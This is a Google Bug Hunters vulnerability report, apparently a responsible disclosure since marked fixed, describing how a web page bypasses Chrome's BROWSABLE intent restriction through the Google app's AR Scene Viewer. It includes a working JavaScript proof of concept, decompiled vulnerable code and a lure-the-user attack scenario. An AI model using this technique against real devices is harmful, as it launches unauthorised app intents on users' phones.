Skip to Content (Press Enter)
Google
Bug Hunters
Chrome BROWSABLE intent:// bypass
Reported by:
NDevTK
Google VRP
triaged
07:13 | Apr 3, 2024
accepted
07:56 | Apr 4, 2024
fixed
00:20 | May 25, 2024
Summary:
Chrome BROWSABLE intent:// bypass
Product:
Google
URL:
https://play.google.com/store/apps/details?id=com.google.android.googlequicksearchbox
Vulnerability type:
Sandbox Escape
Details
I created a chromium bug for this, please CC [REDACTED_EMAIL] "it might be more straightforward to allowlist URIs we redirect to instead of blocking problematic ones."
https://issuetracker.google.com/331834518
onclick = () => { 

 const target = 'intent://<some non-browsable intent>';
 const title = '<h1>Click the button to continue...</h1><p1> :)</p1>';

  location.href = 'intent://arvr.google.com/scene-viewer/1.2?file=https%3A%2F%2Fstorage.googleapis.com%2Far-answers-in-search-models%2Fstatic%2FMallardDuck%2Fmodel.glb&title=' + encodeURIComponent(title) + '&link=' + encodeURIComponent(target) + '#Intent;package=com.google.android.googlequicksearchbox;scheme=https;end'; 

}
On an Android device replace <some non-browsable intent> with some non-browsable intent this could look like
intent://foo#Intent;package=com.example.myapplication;scheme=bar;end
The host "foo" is displayed to the user.
A host is an optional intent parameter.
Putting an attacker controlled intent into startActivity() without sanitization.
BottomViewGroup.java
private void openLink(Uri uri) {
        Uri outboundLink = UriUtilities.getOutboundLink(uri);
        if (outboundLink != null) {
            if (INTENT_SCHEME.equals(outboundLink.getScheme())) {
                try {
                    Intent parseUri = Intent.parseUri(outboundLink.toString(), 1);
                    if (parseUri != null) {
                        getContext().startActivity(parseUri);
                    }
                } catch (URISyntaxException e) {
                    ((hoch) ((hoch) ((hoch) logger.d()).g(e)).aa(41236)).p("Failed to parse intent URI");
                }
            } else {
                ViewerLogger.getInstance().logAction(ArViewerLogEnumOuterClass.ArViewerLogEnum.Action.OPEN_LINK);
                ((hoch) ((hoch) logger.c()).aa(41235)).s("Opening link: %s", outboundLink);
                new ast().a().a(getContext(), outboundLink);
            }
        }
    }
UriUtilities.java
public static Uri getOutboundLink(Uri uri) {
        if (uri == null) {
            return null;
        }
        return uri.buildUpon().appendQueryParameter(UTM_SOURCE_PARAMETER, UTM_SOURCE_VALUE).build();
    }
Attack scenario
A website is able to send intents that are not marked as android.intent.category.BROWSABLE
https://developer.android.com/reference/android/content/Intent#CATEGORY_BROWSABLE
This is an attack known as
https://developer.android.com/privacy-and-security/risks/intent-redirection
its recommended to only launch untrusted intents with the opt-in CATEGORY, chromium would normally have done this but this app bypasses the protection via a tap of a button.
And since
title
supports basic html its possible to make it clear that button should be tapped.
This also acts as a bypass to
https://issues.chromium.org/40060327
as shown in
https://drive.google.com/open?id=1ccNnVavSY2rg1cG5r7IMfdSC9XDHCYMA&authuser=0
NOT ABOUT THE OPEN REDIRECT
The problem is that a different browser can be outdated and contain security issues that don't exist or where since patched in chrome.
I felt like this issue needed more then a comment to explain.
"This seems to be an issue with the AR scene viewer rather than Chrome, since if I understand correctly it is (correctly) handling this intent to it."
登录
使用 Google 账号登录